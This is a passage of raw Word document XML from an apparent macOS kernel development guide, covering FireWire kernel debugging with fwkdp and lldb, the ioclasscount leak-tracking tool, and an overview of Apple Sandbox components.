          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>However, this support comes with a caveat. Once the FireWire controller has been "used" for either FireWireKDP or FireWireKPrintf, it must not be unplugged or the machine will likely panic. So, if you're using a Thunderbolt Display or a Thunderbolt to FireWire Adapter, you should just leave them connected until you disable the "0x8000" boot-arg and restart.</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If you are on a machine without built-in firewire, you can use one of the following:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:eastAsia="宋体" w:hAnsi="Times" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Thunderbolt -&gt; Firewire adaptor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Firewire port on a Apple Thunderbolt display</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On the host machine, open a terminal window and type the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>     fwkdp</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Leave that window open. Now in a second window, you can invoke lldb and issue the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>     kdp-remote localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The fwkdp redirector software redirects kdp packets as if the host machine was the panicked machine. Saving a coredump is done locally on the host, e.g. in lldb:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC6A3D" w:rsidRDefault="00B923E8" w:rsidP="00B923E8">
      <w:pPr>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>     (lldb) sendcore 1.2.3.4 # IP address does not matter for firewire debugging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="00B923E8" w:rsidRDefault="00AC6A3D" w:rsidP="00B923E8">
      <w:pPr>
        <w:spacing w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>     (lldb) sendpanic</w:t>
      </w:r>
      <w:r w:rsidR="00CD4121">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.1.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00B923E8" w:rsidRPr="00B923E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>     (lldb) detach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B923E8" w:rsidRPr="002D5065" w:rsidRDefault="00B923E8" w:rsidP="002D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333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007619F2" w:rsidRDefault="007619F2" w:rsidP="007619F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc445313320"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Useful tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="007619F2" w:rsidRPr="008F3137" w:rsidRDefault="007619F2" w:rsidP="007619F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007619F2" w:rsidRDefault="007619F2" w:rsidP="007619F2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Activity Monitor sampling </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007619F2" w:rsidRDefault="007619F2" w:rsidP="007619F2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ioclasscount </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Pr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0067383D">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">sh-3.2# ioclasscount </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ConfigThread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FramebufferNotifier = 12</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OpenServiceIterator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ServiceInterestNotifier = 77</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ServiceJob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_IOServiceNotifier = 25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CPI_SMC_CtrlLoop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CPI_SMC_GPU_CtrlLoop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CPI_SMC_Idle_CtrlLoop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CPI_SMC_PlatformPlugin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CPI_SMC_PluginUserClient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Client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Controller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EventSource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0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1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2 = 1</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3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GPMHeuristic4 = 0</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21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067383D">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AHCIRequest = 33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0067383D" w:rsidRPr="0067383D" w:rsidRDefault="0067383D" w:rsidP="00673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rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067383D">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AHCISMARTUserClient = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5065" w:rsidRDefault="002D5065" w:rsidP="008F3137"/>
    <w:p w:rsidR="00FB0650" w:rsidRDefault="00FB0650" w:rsidP="00FB0650">
      <w:r>
        <w:t>sh-3.2# ps -ef</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0650" w:rsidRDefault="00FB0650" w:rsidP="00FB0650">
      <w:r>
        <w:t xml:space="preserve">  UID   PID  PPID   C STIME   TTY           TIME CMD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB0650" w:rsidRDefault="00FB0650" w:rsidP="00710FD5">
      <w:pPr>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:t>0    46     1   0 12:59PM ??         0:01.18 /usr/libexec/kextd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00710FD5" w:rsidRDefault="00710FD5" w:rsidP="00710FD5">
      <w:pPr>
        <w:ind w:firstLine="440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00710FD5" w:rsidRDefault="00710FD5" w:rsidP="00710FD5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hook </w:t>
      </w:r>
      <w:r w:rsidR="00570ACB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for leakage detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00710FD5" w:rsidRDefault="00710FD5" w:rsidP="00710FD5">
      <w:pPr>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSObject::taggedRetain(const void *tag)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00710FD5" w:rsidRDefault="00710FD5" w:rsidP="00710FD5">
      <w:pPr>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSObject::taggedRelease(const void *)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00710FD5" w:rsidRPr="008F3137" w:rsidRDefault="00710FD5" w:rsidP="00710FD5">
      <w:pPr>
        <w:ind w:firstLine="440"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc445313321"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple sandbox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRPr="006B4005" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc445313322"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46021F04" wp14:editId="5A6CA50F">
            <wp:extent cx="5274310" cy="34948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494841"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00382662">
        <w:t>Apple Sandbox Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>The Sandbox system is made up of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A27E5A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>userspace library</w:t>
      </w:r>
      <w:r w:rsidR="008A6EA0">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(libsnadbox.dylib)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions for initializing and con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">guring the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sandbox for each</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">process, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003529D1" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mach server</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003529D1" w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003529D1" w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sandboxd</w:t>
      </w:r>
      <w:r w:rsidR="003529D1" w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> handling logging from the kernel, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003529D1" w:rsidRDefault="003529D1" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>kernel extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Sandbox.kext)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A27E5A">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">TrustedBSD API for enforcing individual policies, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003529D1" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">and a </w:t>
      </w:r>
      <w:r w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>kernel support e</w:t>
      </w:r>
      <w:r w:rsidR="003529D1" w:rsidRPr="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>xtension</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(AppleMatch.kext)</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> provi</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">ing regular expression matching for policy enforcement. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="003529D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>above</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows the relationships</w:t>
      </w:r>
      <w:r w:rsidR="003529D1">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t xml:space="preserve">between these components on OS X. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00A27E5A" w:rsidP="00A27E5A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
